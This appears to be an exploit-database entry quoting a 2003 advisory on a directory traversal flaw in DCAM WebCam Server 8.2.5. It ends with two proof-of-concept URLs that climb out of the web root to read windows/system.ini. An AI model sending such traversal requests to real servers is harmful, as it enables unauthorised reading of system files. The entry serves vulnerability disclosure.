dcam webcam server personal Web server 8.2.5 - Directory Traversal
| EKU-ID: 28906 | CVE: OSVDB-3154 | OSVDB-ID: |
| Author: Luigi Auriemma | Published: 2003-12-22 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 28906 | CVE: OSVDB-3154 | OSVDB-ID: |
| Author: Luigi Auriemma | Published: 2003-12-22 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/9273/info It has been reported that the Personal Web Server of DCAM WebCam Server may be prone to a directory traversal vulnerability that may allow a remote attacker to traverse outside the server root directory by using '.\' character sequences. DCAM WebCam server versions 8.2.5 and prior are reported to be prone to this issue. http://www.example.com/.\.\.\.\/windows/system.ini http://www.example.com/.\.\.\.\.\.\.\.\.\.\/windows/system.ini